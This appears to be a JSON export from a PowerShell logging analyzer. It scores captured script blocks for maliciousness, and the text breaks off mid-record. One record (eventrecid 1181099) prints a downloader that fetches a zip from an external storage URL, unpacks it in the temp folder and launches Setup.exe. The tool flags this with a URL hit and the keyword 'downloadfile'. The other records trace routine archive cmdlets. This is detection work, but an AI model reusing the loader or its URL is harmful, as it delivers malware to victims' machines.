Z9 JSON Viewer
[{"eventrecid": "1181097", "time": {"SystemTime": "2024-10-18T10:27:18.1205499Z"}, "totalscore": {"totalscore": 32.390618580814866, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 32.390618580814866, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": ".\\2024-10-18-03_26_17_df7e380cf689832b649826a7e0d4e134.ps1", "removed_backtick": ".\\2024-10-18-03_26_17_df7e380cf689832b649826a7e0d4e134.ps1", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.32390618580814867, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181099", "time": {"SystemTime": "2024-10-18T10:27:18.5150857Z"}, "totalscore": {"totalscore": 113.50519558837637, "score": {"detect_iex": 0, "url_result": 20, "detect_sign": 0, "logistic_reg": 83.50519558837637, "randomized_string": 0, "detect_strings_blacklist": 10}}, "sourcecode": "$webClient = New-Object System.Net.WebClient\n$url1 = \"https://eu2.contabostorage.com/97c9beb737884d93a1899766d9f4e34c:gostired/gopl17.zip\"\n$zipPath1 = \"$env:TEMP\\pgl.zip\" # Fixed variable name and path\n$webClient.DownloadFile($url1, $zipPath1) # Corrected variable references\n$extractPath1 = \"$env:TEMP\\file\"\nExpand-Archive -Path $zipPath1 -DestinationPath $extractPath1 # Consistent variable naming\nStart-Process -FilePath \"$extractPath1\\Setup.exe\" # Ensured correct path to Setup.exe\n", "removed_backtick": "$webClient = New-Object System.Net.WebClient\n$url1 = \"https://eu2.contabostorage.com/97c9beb737884d93a1899766d9f4e34c:gostired/gopl17.zip\"\n$zipPath1 = \"$env:TEMP\\pgl.zip\" # Fixed variable name and path\n$webClient.DownloadFile($url1, $zipPath1) # Corrected variable references\n$extractPath1 = \"$env:TEMP\\file\"\nExpand-Archive -Path $zipPath1 -DestinationPath $extractPath1 # Consistent variable naming\nStart-Process -FilePath \"$extractPath1\\Setup.exe\" # Ensured correct path to Setup.exe\n", "error": {}, "detect_iex": false, "url_result": 
["https://eu2.contabostorage.com/97c9beb737884d93a1899766d9f4e34c"], "detect_sign": 0, "logistic_reg": 0.8350519558837637, "randomized_string": 0, "detect_strings_blacklist": [{"keyword": "downloadfile", "score": 10}]}, {"eventrecid": "1181105", "time": {"SystemTime": "2024-10-18T10:27:19.5199616Z"}, "totalscore": {"totalscore": 86.88775103759336, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 86.88775103759336, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.Net.WebClient\"\n", "removed_backtick": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.Net.WebClient\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.8688775103759336, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181109", "time": {"SystemTime": "2024-10-18T10:27:27.8606968Z"}, "totalscore": {"totalscore": 22.551376089399774, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 22.551376089399774, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(ConvertFrom-StringData): \"ConvertFrom-StringData\"\nParameterBinding(ConvertFrom-StringData): name=\"StringData\"; value=\" PathNotFoundError=The path '{0}' either does not exist or is not a valid file system path.\n ExpandArchiveInValidDestinationPath=The path '{0}' is not a valid file system directory path.\n InvalidZipFileExtensionError={0} is not a supported archive file format. {1} is the only supported archive file format.\n ArchiveFileIsReadOnly=The attributes of the archive file {0} is set to 'ReadOnly' hence it cannot be updated. 
If you intend to update the existing archive file, remove the 'ReadOnly' attribute on the archive file else use -Force parameter to override and create a new archive file.\n ZipFileExistError=The archive file {0} already exists. Use the -Update parameter to update the existing archive file or use the -Force parameter to overwrite the existing archive file.\n DuplicatePathFoundError=The input to {0} parameter contains a duplicate path '{1}'. Provide a unique set of paths as input to {2} parameter.\n ArchiveFileIsEmpty=The archive file {0} is empty.\n CompressProgressBarText=The archive file '{0}' creation is in progress...\n ExpandProgressBarText=The archive file '{0}' expansion is in progress...\n AppendArchiveFileExtensionMessage=The archive file path '{0}' supplied to the DestinationPath patameter does not include .zip extension. Hence .zip is appended to the supplied DestinationPath path and the archive file would be created at '{1}'.\n AddItemtoArchiveFile=Adding '{0}'.\n BadArchiveEntry=Can not process invalid archive entry '{0}'.\n CreateFileAtExpandedPath=Created '{0}'.\n InvalidArchiveFilePathError=The archive file path '{0}' specified as input to the {1} parameter is resolving to multiple file system paths. Provide a unique path to the {2} parameter where the archive file has to be created.\n InvalidExpandedDirPathError=The directory path '{0}' specified as input to the DestinationPath parameter is resolving to multiple file system paths. Provide a unique path to the Destination parameter where the archive file contents have to be expanded.\n FileExistsError=Failed to create file '{0}' while expanding the archive file '{1}' contents as the file '{2}' already exists. 
Use the -Force parameter if you want to overwrite the existing directory '{3}' contents when expanding the archive file.\n DeleteArchiveFile=The partially created archive file '{0}' is deleted as it is not usable.\n InvalidDestinationPath=The destination path '{0}' does not contain a valid archive file name.\n PreparingToCompressVerboseMessage=Preparing to compress...\n PreparingToExpandVerboseMessage=Preparing to expand...\"\n", "removed_backtick": "CommandInvocation(ConvertFrom-StringData): \"ConvertFrom-StringData\"\nParameterBinding(ConvertFrom-StringData): name=\"StringData\"; value=\" PathNotFoundError=The path '{0}' either does not exist or is not a valid file system path.\n ExpandArchiveInValidDestinationPath=The path '{0}' is not a valid file system directory path.\n InvalidZipFileExtensionError={0} is not a supported archive file format. {1} is the only supported archive file format.\n ArchiveFileIsReadOnly=The attributes of the archive file {0} is set to 'ReadOnly' hence it cannot be updated. If you intend to update the existing archive file, remove the 'ReadOnly' attribute on the archive file else use -Force parameter to override and create a new archive file.\n ZipFileExistError=The archive file {0} already exists. Use the -Update parameter to update the existing archive file or use the -Force parameter to overwrite the existing archive file.\n DuplicatePathFoundError=The input to {0} parameter contains a duplicate path '{1}'. Provide a unique set of paths as input to {2} parameter.\n ArchiveFileIsEmpty=The archive file {0} is empty.\n CompressProgressBarText=The archive file '{0}' creation is in progress...\n ExpandProgressBarText=The archive file '{0}' expansion is in progress...\n AppendArchiveFileExtensionMessage=The archive file path '{0}' supplied to the DestinationPath patameter does not include .zip extension. 
Hence .zip is appended to the supplied DestinationPath path and the archive file would be created at '{1}'.\n AddItemtoArchiveFile=Adding '{0}'.\n BadArchiveEntry=Can not process invalid archive entry '{0}'.\n CreateFileAtExpandedPath=Created '{0}'.\n InvalidArchiveFilePathError=The archive file path '{0}' specified as input to the {1} parameter is resolving to multiple file system paths. Provide a unique path to the {2} parameter where the archive file has to be created.\n InvalidExpandedDirPathError=The directory path '{0}' specified as input to the DestinationPath parameter is resolving to multiple file system paths. Provide a unique path to the Destination parameter where the archive file contents have to be expanded.\n FileExistsError=Failed to create file '{0}' while expanding the archive file '{1}' contents as the file '{2}' already exists. Use the -Force parameter if you want to overwrite the existing directory '{3}' contents when expanding the archive file.\n DeleteArchiveFile=The partially created archive file '{0}' is deleted as it is not usable.\n InvalidDestinationPath=The destination path '{0}' does not contain a valid archive file name.\n PreparingToCompressVerboseMessage=Preparing to compress...\n PreparingToExpandVerboseMessage=Preparing to expand...\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.22551376089399774, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181110", "time": {"SystemTime": "2024-10-18T10:27:29.0908842Z"}, "totalscore": {"totalscore": 22.05504632977611, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 22.05504632977611, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "# Localized\t12/07/2019 01:00 AM (GMT)\t303:6.40.20520 \tArchiveResources.psd1\n# Localized ArchiveResources.psd1\n\nConvertFrom-StringData @'\n###PSLOC\nPathNotFoundError=The path '{0}' either does not exist or is not a valid file system 
path.\nExpandArchiveInValidDestinationPath=The path '{0}' is not a valid file system directory path.\nInvalidZipFileExtensionError={0} is not a supported archive file format. {1} is the only supported archive file format.\nArchiveFileIsReadOnly=The attributes of the archive file {0} is set to 'ReadOnly' hence it cannot be updated. If you intend to update the existing archive file, remove the 'ReadOnly' attribute on the archive file else use -Force parameter to override and create a new archive file.\nZipFileExistError=The archive file {0} already exists. Use the -Update parameter to update the existing archive file or use the -Force parameter to overwrite the existing archive file.\nDuplicatePathFoundError=The input to {0} parameter contains a duplicate path '{1}'. Provide a unique set of paths as input to {2} parameter.\nArchiveFileIsEmpty=The archive file {0} is empty.\nCompressProgressBarText=The archive file '{0}' creation is in progress...\nExpandProgressBarText=The archive file '{0}' expansion is in progress...\nAppendArchiveFileExtensionMessage=The archive file path '{0}' supplied to the DestinationPath patameter does not include .zip extension. Hence .zip is appended to the supplied DestinationPath path and the archive file would be created at '{1}'.\nAddItemtoArchiveFile=Adding '{0}'.\nBadArchiveEntry=Can not process invalid archive entry '{0}'.\nCreateFileAtExpandedPath=Created '{0}'.\nInvalidArchiveFilePathError=The archive file path '{0}' specified as input to the {1} parameter is resolving to multiple file system paths. Provide a unique path to the {2} parameter where the archive file has to be created.\nInvalidExpandedDirPathError=The directory path '{0}' specified as input to the DestinationPath parameter is resolving to multiple file system paths. 
Provide a unique path to the Destination parameter where the archive file contents have to be expanded.\nFileExistsError=Failed to create file '{0}' while expanding the archive file '{1}' contents as the file '{2}' already exists. Use the -Force parameter if you want to overwrite the existing directory '{3}' contents when expanding the archive file.\nDeleteArchiveFile=The partially created archive file '{0}' is deleted as it is not usable.\nInvalidDestinationPath=The destination path '{0}' does not contain a valid archive file name.\nPreparingToCompressVerboseMessage=Preparing to compress...\nPreparingToExpandVerboseMessage=Preparing to expand...\n###PSLOC\n'@\n", "removed_backtick": "# Localized\t12/07/2019 01:00 AM (GMT)\t303:6.40.20520 \tArchiveResources.psd1\n# Localized ArchiveResources.psd1\n\nConvertFrom-StringData @'\n###PSLOC\nPathNotFoundError=The path '{0}' either does not exist or is not a valid file system path.\nExpandArchiveInValidDestinationPath=The path '{0}' is not a valid file system directory path.\nInvalidZipFileExtensionError={0} is not a supported archive file format. {1} is the only supported archive file format.\nArchiveFileIsReadOnly=The attributes of the archive file {0} is set to 'ReadOnly' hence it cannot be updated. If you intend to update the existing archive file, remove the 'ReadOnly' attribute on the archive file else use -Force parameter to override and create a new archive file.\nZipFileExistError=The archive file {0} already exists. Use the -Update parameter to update the existing archive file or use the -Force parameter to overwrite the existing archive file.\nDuplicatePathFoundError=The input to {0} parameter contains a duplicate path '{1}'. 
Provide a unique set of paths as input to {2} parameter.\nArchiveFileIsEmpty=The archive file {0} is empty.\nCompressProgressBarText=The archive file '{0}' creation is in progress...\nExpandProgressBarText=The archive file '{0}' expansion is in progress...\nAppendArchiveFileExtensionMessage=The archive file path '{0}' supplied to the DestinationPath patameter does not include .zip extension. Hence .zip is appended to the supplied DestinationPath path and the archive file would be created at '{1}'.\nAddItemtoArchiveFile=Adding '{0}'.\nBadArchiveEntry=Can not process invalid archive entry '{0}'.\nCreateFileAtExpandedPath=Created '{0}'.\nInvalidArchiveFilePathError=The archive file path '{0}' specified as input to the {1} parameter is resolving to multiple file system paths. Provide a unique path to the {2} parameter where the archive file has to be created.\nInvalidExpandedDirPathError=The directory path '{0}' specified as input to the DestinationPath parameter is resolving to multiple file system paths. Provide a unique path to the Destination parameter where the archive file contents have to be expanded.\nFileExistsError=Failed to create file '{0}' while expanding the archive file '{1}' contents as the file '{2}' already exists. 
Use the -Force parameter if you want to overwrite the existing directory '{3}' contents when expanding the archive file.\nDeleteArchiveFile=The partially created archive file '{0}' is deleted as it is not usable.\nInvalidDestinationPath=The destination path '{0}' does not contain a valid archive file name.\nPreparingToCompressVerboseMessage=Preparing to compress...\nPreparingToExpandVerboseMessage=Preparing to expand...\n###PSLOC\n'@\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.2205504632977611, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181112", "time": {"SystemTime": "2024-10-18T10:27:29.3651373Z"}, "totalscore": {"totalscore": 22.551376089399774, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 22.551376089399774, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(ConvertFrom-StringData): \"ConvertFrom-StringData\"\nParameterBinding(ConvertFrom-StringData): name=\"StringData\"; value=\"###PSLOC\nPathNotFoundError=The path '{0}' either does not exist or is not a valid file system path.\nExpandArchiveInValidDestinationPath=The path '{0}' is not a valid file system directory path.\nInvalidZipFileExtensionError={0} is not a supported archive file format. {1} is the only supported archive file format.\nArchiveFileIsReadOnly=The attributes of the archive file {0} is set to 'ReadOnly' hence it cannot be updated. If you intend to update the existing archive file, remove the 'ReadOnly' attribute on the archive file else use -Force parameter to override and create a new archive file.\nZipFileExistError=The archive file {0} already exists. Use the -Update parameter to update the existing archive file or use the -Force parameter to overwrite the existing archive file.\nDuplicatePathFoundError=The input to {0} parameter contains a duplicate path '{1}'. 
Provide a unique set of paths as input to {2} parameter.\nArchiveFileIsEmpty=The archive file {0} is empty.\nCompressProgressBarText=The archive file '{0}' creation is in progress...\nExpandProgressBarText=The archive file '{0}' expansion is in progress...\nAppendArchiveFileExtensionMessage=The archive file path '{0}' supplied to the DestinationPath patameter does not include .zip extension. Hence .zip is appended to the supplied DestinationPath path and the archive file would be created at '{1}'.\nAddItemtoArchiveFile=Adding '{0}'.\nBadArchiveEntry=Can not process invalid archive entry '{0}'.\nCreateFileAtExpandedPath=Created '{0}'.\nInvalidArchiveFilePathError=The archive file path '{0}' specified as input to the {1} parameter is resolving to multiple file system paths. Provide a unique path to the {2} parameter where the archive file has to be created.\nInvalidExpandedDirPathError=The directory path '{0}' specified as input to the DestinationPath parameter is resolving to multiple file system paths. Provide a unique path to the Destination parameter where the archive file contents have to be expanded.\nFileExistsError=Failed to create file '{0}' while expanding the archive file '{1}' contents as the file '{2}' already exists. 
Use the -Force parameter if you want to overwrite the existing directory '{3}' contents when expanding the archive file.\nDeleteArchiveFile=The partially created archive file '{0}' is deleted as it is not usable.\nInvalidDestinationPath=The destination path '{0}' does not contain a valid archive file name.\nPreparingToCompressVerboseMessage=Preparing to compress...\nPreparingToExpandVerboseMessage=Preparing to expand...\n###PSLOC\"\n", "removed_backtick": "CommandInvocation(ConvertFrom-StringData): \"ConvertFrom-StringData\"\nParameterBinding(ConvertFrom-StringData): name=\"StringData\"; value=\"###PSLOC\nPathNotFoundError=The path '{0}' either does not exist or is not a valid file system path.\nExpandArchiveInValidDestinationPath=The path '{0}' is not a valid file system directory path.\nInvalidZipFileExtensionError={0} is not a supported archive file format. {1} is the only supported archive file format.\nArchiveFileIsReadOnly=The attributes of the archive file {0} is set to 'ReadOnly' hence it cannot be updated. If you intend to update the existing archive file, remove the 'ReadOnly' attribute on the archive file else use -Force parameter to override and create a new archive file.\nZipFileExistError=The archive file {0} already exists. Use the -Update parameter to update the existing archive file or use the -Force parameter to overwrite the existing archive file.\nDuplicatePathFoundError=The input to {0} parameter contains a duplicate path '{1}'. Provide a unique set of paths as input to {2} parameter.\nArchiveFileIsEmpty=The archive file {0} is empty.\nCompressProgressBarText=The archive file '{0}' creation is in progress...\nExpandProgressBarText=The archive file '{0}' expansion is in progress...\nAppendArchiveFileExtensionMessage=The archive file path '{0}' supplied to the DestinationPath patameter does not include .zip extension. 
Hence .zip is appended to the supplied DestinationPath path and the archive file would be created at '{1}'.\nAddItemtoArchiveFile=Adding '{0}'.\nBadArchiveEntry=Can not process invalid archive entry '{0}'.\nCreateFileAtExpandedPath=Created '{0}'.\nInvalidArchiveFilePathError=The archive file path '{0}' specified as input to the {1} parameter is resolving to multiple file system paths. Provide a unique path to the {2} parameter where the archive file has to be created.\nInvalidExpandedDirPathError=The directory path '{0}' specified as input to the DestinationPath parameter is resolving to multiple file system paths. Provide a unique path to the Destination parameter where the archive file contents have to be expanded.\nFileExistsError=Failed to create file '{0}' while expanding the archive file '{1}' contents as the file '{2}' already exists. Use the -Force parameter if you want to overwrite the existing directory '{3}' contents when expanding the archive file.\nDeleteArchiveFile=The partially created archive file '{0}' is deleted as it is not usable.\nInvalidDestinationPath=The destination path '{0}' does not contain a valid archive file name.\nPreparingToCompressVerboseMessage=Preparing to compress...\nPreparingToExpandVerboseMessage=Preparing to expand...\n###PSLOC\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.22551376089399774, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181114", "time": {"SystemTime": "2024-10-18T10:27:29.3681903Z"}, "totalscore": {"totalscore": 65.69453226062033, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 65.69453226062033, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Import-LocalizedData): \"Import-LocalizedData\"\nParameterBinding(Import-LocalizedData): name=\"FileName\"; value=\"ArchiveResources\"\nParameterBinding(Import-LocalizedData): name=\"BindingVariable\"; 
value=\"LocalizedData\"\n", "removed_backtick": "CommandInvocation(Import-LocalizedData): \"Import-LocalizedData\"\nParameterBinding(Import-LocalizedData): name=\"FileName\"; value=\"ArchiveResources\"\nParameterBinding(Import-LocalizedData): name=\"BindingVariable\"; value=\"LocalizedData\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.6569453226062033, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181118", "time": {"SystemTime": "2024-10-18T10:27:33.4045266Z"}, "totalscore": {"totalscore": 61.84808875684497, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 61.84808875684497, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\"\nParameterBinding(Test-Path): name=\"PathType\"; value=\"Container\"\n", "removed_backtick": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\"\nParameterBinding(Test-Path): name=\"PathType\"; value=\"Container\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.6184808875684498, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181119", "time": {"SystemTime": "2024-10-18T10:27:33.5620033Z"}, "totalscore": {"totalscore": 53.753374143288724, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 53.753374143288724, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(New-Item): \"New-Item\"\nParameterBinding(New-Item): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\"\nParameterBinding(New-Item): name=\"ItemType\"; value=\"Directory\"\nParameterBinding(New-Item): name=\"Confirm\"; value=\"False\"\nParameterBinding(New-Item): name=\"Verbose\"; 
value=\"False\"\nParameterBinding(New-Item): name=\"ErrorAction\"; value=\"Stop\"\n", "removed_backtick": "CommandInvocation(New-Item): \"New-Item\"\nParameterBinding(New-Item): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\"\nParameterBinding(New-Item): name=\"ItemType\"; value=\"Directory\"\nParameterBinding(New-Item): name=\"Confirm\"; value=\"False\"\nParameterBinding(New-Item): name=\"Verbose\"; value=\"False\"\nParameterBinding(New-Item): name=\"ErrorAction\"; value=\"Stop\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.5375337414328872, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181121", "time": {"SystemTime": "2024-10-18T10:27:33.9349248Z"}, "totalscore": {"totalscore": 52.604858131117595, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 52.604858131117595, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Resolve-Path): \"Resolve-Path\"\nParameterBinding(Resolve-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\"\nParameterBinding(Resolve-Path): name=\"ErrorAction\"; value=\"Stop\"\n", "removed_backtick": "CommandInvocation(Resolve-Path): \"Resolve-Path\"\nParameterBinding(Resolve-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\"\nParameterBinding(Resolve-Path): name=\"ErrorAction\"; value=\"Stop\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.5260485813111759, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181123", "time": {"SystemTime": "2024-10-18T10:27:34.0719476Z"}, "totalscore": {"totalscore": 63.15828354343031, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 63.15828354343031, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(GetResolvedPathHelper): 
\"GetResolvedPathHelper\"\nParameterBinding(GetResolvedPathHelper): name=\"path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\"\nParameterBinding(GetResolvedPathHelper): name=\"isLiteralPath\"; value=\"True\"\nParameterBinding(GetResolvedPathHelper): name=\"callerPSCmdlet\"; value=\"System.Management.Automation.PSScriptCmdlet\"\n", "removed_backtick": "CommandInvocation(GetResolvedPathHelper): \"GetResolvedPathHelper\"\nParameterBinding(GetResolvedPathHelper): name=\"path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\"\nParameterBinding(GetResolvedPathHelper): name=\"isLiteralPath\"; value=\"True\"\nParameterBinding(GetResolvedPathHelper): name=\"callerPSCmdlet\"; value=\"System.Management.Automation.PSScriptCmdlet\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.631582835434303, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181124", "time": {"SystemTime": "2024-10-18T10:27:34.0966956Z"}, "totalscore": {"totalscore": 38.44846395971383, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 38.44846395971383, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Write-Verbose): \"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Preparing to expand...\"\n", "removed_backtick": "CommandInvocation(Write-Verbose): \"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Preparing to expand...\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.38448463959713824, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181126", "time": {"SystemTime": "2024-10-18T10:27:45.2349946Z"}, "totalscore": {"totalscore": 42.851037649569584, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 42.851037649569584, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": 
"CommandInvocation(Write-Progress): \"Write-Progress\"\nParameterBinding(Write-Progress): name=\"Activity\"; value=\"Expand-Archive\"\nParameterBinding(Write-Progress): name=\"Status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\file' expansion is in progress...\"\nParameterBinding(Write-Progress): name=\"PercentComplete\"; value=\"1\"\n", "removed_backtick": "CommandInvocation(Write-Progress): \"Write-Progress\"\nParameterBinding(Write-Progress): name=\"Activity\"; value=\"Expand-Archive\"\nParameterBinding(Write-Progress): name=\"Status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\file' expansion is in progress...\"\nParameterBinding(Write-Progress): name=\"PercentComplete\"; value=\"1\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.42851037649569584, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181128", "time": {"SystemTime": "2024-10-18T10:27:45.2356658Z"}, "totalscore": {"totalscore": 46.41770426554508, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 46.41770426554508, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(ProgressBarHelper): \"ProgressBarHelper\"\nParameterBinding(ProgressBarHelper): name=\"cmdletName\"; value=\"Expand-Archive\"\nParameterBinding(ProgressBarHelper): name=\"status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\file' expansion is in progress...\"\nParameterBinding(ProgressBarHelper): name=\"previousSegmentWeight\"; value=\"0\"\nParameterBinding(ProgressBarHelper): name=\"currentSegmentWeight\"; value=\"100\"\nParameterBinding(ProgressBarHelper): name=\"totalNumberofEntries\"; value=\"100\"\nParameterBinding(ProgressBarHelper): name=\"currentEntryCount\"; value=\"1\"\n", "removed_backtick": "CommandInvocation(ProgressBarHelper): \"ProgressBarHelper\"\nParameterBinding(ProgressBarHelper): name=\"cmdletName\"; 
value=\"Expand-Archive\"\nParameterBinding(ProgressBarHelper): name=\"status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\file' expansion is in progress...\"\nParameterBinding(ProgressBarHelper): name=\"previousSegmentWeight\"; value=\"0\"\nParameterBinding(ProgressBarHelper): name=\"currentSegmentWeight\"; value=\"100\"\nParameterBinding(ProgressBarHelper): name=\"totalNumberofEntries\"; value=\"100\"\nParameterBinding(ProgressBarHelper): name=\"currentEntryCount\"; value=\"1\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.46417704265545084, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181130", "time": {"SystemTime": "2024-10-18T10:27:45.3349086Z"}, "totalscore": {"totalscore": 59.17797068248686, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 59.17797068248686, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Resolve-Path): \"Resolve-Path\"\nParameterBinding(Resolve-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip\"\nParameterBinding(Resolve-Path): name=\"ErrorAction\"; value=\"Stop\"\n", "removed_backtick": "CommandInvocation(Resolve-Path): \"Resolve-Path\"\nParameterBinding(Resolve-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip\"\nParameterBinding(Resolve-Path): name=\"ErrorAction\"; value=\"Stop\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.5917797068248686, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181132", "time": {"SystemTime": "2024-10-18T10:27:45.3354133Z"}, "totalscore": {"totalscore": 58.61849511566167, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 58.61849511566167, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(GetResolvedPathHelper): 
\"GetResolvedPathHelper\"\nParameterBinding(GetResolvedPathHelper): name=\"path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip\"\nParameterBinding(GetResolvedPathHelper): name=\"isLiteralPath\"; value=\"False\"\nParameterBinding(GetResolvedPathHelper): name=\"callerPSCmdlet\"; value=\"System.Management.Automation.PSScriptCmdlet\"\n", "removed_backtick": "CommandInvocation(GetResolvedPathHelper): \"GetResolvedPathHelper\"\nParameterBinding(GetResolvedPathHelper): name=\"path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip\"\nParameterBinding(GetResolvedPathHelper): name=\"isLiteralPath\"; value=\"False\"\nParameterBinding(GetResolvedPathHelper): name=\"callerPSCmdlet\"; value=\"System.Management.Automation.PSScriptCmdlet\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.5861849511566167, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181135", "time": {"SystemTime": "2024-10-18T10:27:45.4238430Z"}, "totalscore": {"totalscore": 65.22041929842048, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 65.22041929842048, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(ValidateArchivePathHelper): \"ValidateArchivePathHelper\"\nParameterBinding(ValidateArchivePathHelper): name=\"archiveFile\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip\"\n", "removed_backtick": "CommandInvocation(ValidateArchivePathHelper): \"ValidateArchivePathHelper\"\nParameterBinding(ValidateArchivePathHelper): name=\"archiveFile\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.6522041929842048, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181138", "time": {"SystemTime": "2024-10-18T10:27:45.8652144Z"}, "totalscore": {"totalscore": 67.02596314275281, "score": {"detect_iex": 0, "url_result": 0, 
